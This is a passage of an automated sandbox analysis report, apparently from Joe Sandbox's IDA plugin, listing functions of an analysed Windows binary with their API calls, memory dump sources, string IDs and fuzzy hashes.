                                                            • Opcode Fuzzy Hash: 5de4ec93eb69aee5b36f9621221d2e870f6a1df20feb5493478e9ad738958d16
                                                            • Instruction Fuzzy Hash: 8261DE75508300ABC720EF24CC85EAFB3E9AFE9714F10491DF545972A2DB70AD85CB92
                                                            Function 0022B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00B96640), ref: 0022B6A5
                                                            • IsWindowEnabled.USER32(00B96640), ref: 0022B6B1
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0022B795
                                                            • SendMessageW.USER32(00B96640,000000B0,?,?), ref: 0022B7CC
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0022B809
                                                            • GetWindowLongW.USER32(00B96640,000000EC), ref: 0022B82B
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0022B843
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: e827cce75e88129b095d9bb7ffa135504d922eace11e430f6d8d1d121528bc01
                                                            • Instruction ID: 69c550f0f25a6f08e8db5d94bc489bfd2e93e018ddc8f7102d7a303988ec0dea
                                                            • Opcode Fuzzy Hash: e827cce75e88129b095d9bb7ffa135504d922eace11e430f6d8d1d121528bc01
                                                            • Instruction Fuzzy Hash: F371D135610216BFDB229FA4E8D8FBABBB9FF49300F044069E94597261C731AC61DF50
                                                            Function 0021F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0021F75C
                                                            • _memset.LIBCMT ref: 0021F825
                                                            • ShellExecuteExW.SHELL32(?), ref: 0021F86A
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0021F8E1
                                                            • CloseHandle.KERNEL32(00000000), ref: 0021F910
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: 77e3384b22866df9eaca4d276bb14e4a27a969f9ff0bda5f5aef6c354fc557ec
                                                            • Instruction ID: 3c26e3df6aea0ad23d0c27d39042cef874c31d49c4279a5dad3cfcbd1d42c840
                                                            • Opcode Fuzzy Hash: 77e3384b22866df9eaca4d276bb14e4a27a969f9ff0bda5f5aef6c354fc557ec
                                                            • Instruction Fuzzy Hash: B261BF75A00619DFCF14EF54C580AAEBBF4FF59310F158469E856AB361CB30AD91CB90
                                                            Function 0020145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0020149C
                                                            • GetKeyboardState.USER32(?), ref: 002014B1
                                                            • SetKeyboardState.USER32(?), ref: 00201512
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00201540
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0020155F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 002015A5
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002015C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: a1181e3efcd73421dbe4e0d3f2fa9476241549bc223a62afe700f56fa01d5cdf
                                                            • Instruction ID: 77b6ed0e613c26a6f4b9e5cc721062e1d792d962214ab7d1beb0623dca971ea4
                                                            • Opcode Fuzzy Hash: a1181e3efcd73421dbe4e0d3f2fa9476241549bc223a62afe700f56fa01d5cdf
                                                            • Instruction Fuzzy Hash: D75125A0A247D63EFB364A348C45BBABEA96B46304F0C4489E1D54A8D3C3D5DCB4D750
                                                            Function 00201276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 002012B5
                                                            • GetKeyboardState.USER32(?), ref: 002012CA
                                                            • SetKeyboardState.USER32(?), ref: 0020132B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00201357
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00201374
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002013B8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002013D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: ee3adc24c957f7502d14fff7d778f92c89334d6510d36d9374e32c76cdfd875f
                                                            • Instruction ID: 0c2408320a85662848b265a8ee3288a7e4e43023b07f749e8304b7d2c1a96249
                                                            • Opcode Fuzzy Hash: ee3adc24c957f7502d14fff7d778f92c89334d6510d36d9374e32c76cdfd875f
                                                            • Instruction Fuzzy Hash: D051E5A09247D63EFB368B648C55B7ABFA96F06300F0885C9E1D4468D3D395ECB4D750
                                                            Function 0020589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: b23bfb558946648f20b57f14d4a71302d9778c3cc5dc8634b685cd735476bcf0
                                                            • Instruction ID: 69c6f03fdbe893c7bb505fad35d5a94e7ac6434321395a164f806bf9f17e6d2d
                                                            • Opcode Fuzzy Hash: b23bfb558946648f20b57f14d4a71302d9778c3cc5dc8634b685cd735476bcf0
                                                            • Instruction Fuzzy Hash: DF417169C2062876CB10EBB49886ECFB3AC9F25710F50895AF518E3162E734E715C7A9
                                                            Function 001FDA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001FDAC5
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001FDAFB
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001FDB0C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001FDB8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,#$DllGetClassObject
                                                            • API String ID: 753597075-1925594170
                                                            • Opcode ID: 5977b4819c090bb1b1367b964831c64d58aad30ccbc45ac9bc526bafa355ac6c
                                                            • Instruction ID: ddac51c644cd6da96191e9021d59cf20b6e4d5180b8d20823a9650ba6c5f04ce
                                                            • Opcode Fuzzy Hash: 5977b4819c090bb1b1367b964831c64d58aad30ccbc45ac9bc526bafa355ac6c
                                                            • Instruction Fuzzy Hash: 014182B1600208EFDB15CF54D985ABABBBAEF45310F1681ADAE099F205D7B1DD44CBA0
                                                            Function 002038AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002038D3,?), ref: 002048C7
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002038D3,?), ref: 002048E0
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 002038F3
                                                            • _wcscmp.LIBCMT ref: 0020390F
                                                            • MoveFileW.KERNEL32(?,?), ref: 00203927
                                                            • _wcscat.LIBCMT ref: 0020396F
                                                            • SHFileOperationW.SHELL32(?), ref: 002039DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: 8a16cfdfb8445a83afe029ad07cd4cdc4d721b1e15ccea4b4c3154ecaa8ba6a6
                                                            • Instruction ID: a865372158492747c1445946148cb899492076c69a0d6807dbe8f54f1a65bb98
                                                            • Opcode Fuzzy Hash: 8a16cfdfb8445a83afe029ad07cd4cdc4d721b1e15ccea4b4c3154ecaa8ba6a6
                                                            • Instruction Fuzzy Hash: 7F41A0B1418389AEC751EF64C481ADFB7ECAF99340F00092EF489C3192EB74D658CB52
                                                            Function 00227500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00227519
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002275C0
                                                            • IsMenu.USER32(?), ref: 002275D8
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00227620
                                                            • DrawMenuBar.USER32 ref: 00227633
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: ba38c4770762a880f630286461b68ec14afe2f4570120488eadf7dbaa9acda38
                                                            • Instruction ID: 0634a70fefd948fc251efa72d2165d3635d1127af6f9a7d3b0f85ce7db807490
                                                            • Opcode Fuzzy Hash: ba38c4770762a880f630286461b68ec14afe2f4570120488eadf7dbaa9acda38
                                                            • Instruction Fuzzy Hash: 53414C75A18619EFDB20DF95E984EAABBF8FF04310F448029F9259B250D730AD60CF90
                                                            Function 0022122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0022125C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00221286
                                                            • FreeLibrary.KERNEL32(00000000), ref: 0022133D
                                                              • Part of subcall function 0022122D: RegCloseKey.ADVAPI32(?), ref: 002212A3
                                                              • Part of subcall function 0022122D: FreeLibrary.KERNEL32(?), ref: 002212F5
                                                              • Part of subcall function 0022122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00221318
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 002212E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: 4a1605d132e9f7654074a8d293010b167e166b6ab36fbdb63725777c8b8db8f4
                                                            • Instruction ID: 52ce09dfc556f018d10fa5ad1667c403e019b1b510e5e15a2e08a7945e3d9d1f
                                                            • Opcode Fuzzy Hash: 4a1605d132e9f7654074a8d293010b167e166b6ab36fbdb63725777c8b8db8f4
                                                            • Instruction Fuzzy Hash: 46310A71911129BFDB14DFD0EC89EFFB7BCEB18300F1001BAA901E2151DA749F659AA0
                                                            Function 0022653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0022655B
                                                            • GetWindowLongW.USER32(00B96640,000000F0), ref: 0022658E
                                                            • GetWindowLongW.USER32(00B96640,000000F0), ref: 002265C3
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002265F5
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0022661F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00226630
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0022664A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: f3f3160f9fc203ae07aa9ac54657b5afdd7e3ae90489999df93ed55f4d8bf0da
                                                            • Instruction ID: 21e2f8aa61b13cf7fdfd71c05a3408b44b1db694256cd06a5ee66a91670a9263
                                                            • Opcode Fuzzy Hash: f3f3160f9fc203ae07aa9ac54657b5afdd7e3ae90489999df93ed55f4d8bf0da
                                                            • Instruction Fuzzy Hash: C2311532614161AFDB20CFA8EC8CF6537E9FB4A710F584168F5118B2B5CB72AC64DB81
                                                            Function 00216486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002164D9
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002164E8
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00216521
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 0021652A
                                                            • WSAGetLastError.WSOCK32 ref: 00216534
                                                            • closesocket.WSOCK32(00000000), ref: 0021655D
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00216576
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: cb7f1525bf6c650e4cf61cd5ccc334975f490f671c09fd4f532edac47b06cf37
                                                            • Instruction ID: f7bd2b7e87cfc5c39392152340a29ac8d7e7aa121172e29f70b5720517350d0d
                                                            • Opcode Fuzzy Hash: cb7f1525bf6c650e4cf61cd5ccc334975f490f671c09fd4f532edac47b06cf37
                                                            • Instruction Fuzzy Hash: E531C131610118AFDB209F64DC89BBE7BF9EB55720F004069F90597291DB70AD95CBA1
                                                            Function 001FE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001FE0FA
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001FE120
                                                            • SysAllocString.OLEAUT32(00000000), ref: 001FE123
                                                            • SysAllocString.OLEAUT32 ref: 001FE144
                                                            • SysFreeString.OLEAUT32 ref: 001FE14D
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 001FE167
                                                            • SysAllocString.OLEAUT32(?), ref: 001FE175
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: cbbae1143758e6653b357f615b47dbba0753549973b1d9e2943c79c910c59651
                                                            • Instruction ID: c816302bbe56b3724a2a1d5a6fa42ff80abfe45d9ba37cd7c322ebfee3d8d2df
                                                            • Opcode Fuzzy Hash: cbbae1143758e6653b357f615b47dbba0753549973b1d9e2943c79c910c59651
                                                            • Instruction Fuzzy Hash: 49212C35604208BF9B20AFA9DD89DBB77ECEB09760B508235FA15CB261DB709C418B64
                                                            Function 0022783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001A1D73
                                                              • Part of subcall function 001A1D35: GetStockObject.GDI32(00000011), ref: 001A1D87
                                                              • Part of subcall function 001A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A1D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002278A1
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002278AE
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002278B9
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002278C8
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002278D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 3b99b9b54011c9e73cbc4fbb0b73b9c25a09ead1a71c7415003b467de0e75c70
                                                            • Instruction ID: fa18c815ee11021963f72c86fc3b60adbc816570b064e1d5b784641ae30550c0
                                                            • Opcode Fuzzy Hash: 3b99b9b54011c9e73cbc4fbb0b73b9c25a09ead1a71c7415003b467de0e75c70
                                                            • Instruction Fuzzy Hash: 1711B2B251422ABFEF159FA0DC89EE77F6DEF08758F014114FA04A2090C7729C21DBA4
                                                            Function 001C41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,001C4292,?), ref: 001C41E3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001C41EA
                                                            • EncodePointer.KERNEL32(00000000), ref: 001C41F6
                                                            • DecodePointer.KERNEL32(00000001,001C4292,?), ref: 001C4213
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: c1904d4207786ff031314487c37adc3431adfb9c8301862ae11cdd82a0214241
                                                            • Instruction ID: 2b62022c5777e0112998b07cc7408322804df2eb893005e16bb25949669de5a7
                                                            • Opcode Fuzzy Hash: c1904d4207786ff031314487c37adc3431adfb9c8301862ae11cdd82a0214241
                                                            • Instruction Fuzzy Hash: B0E01AB0690340EFEB60AFB0FD0DB043AA5BB66B02F50A4B8F455D50E0DBF540A68F00
                                                            Function 001C429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001C41B8), ref: 001C42B8
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001C42BF
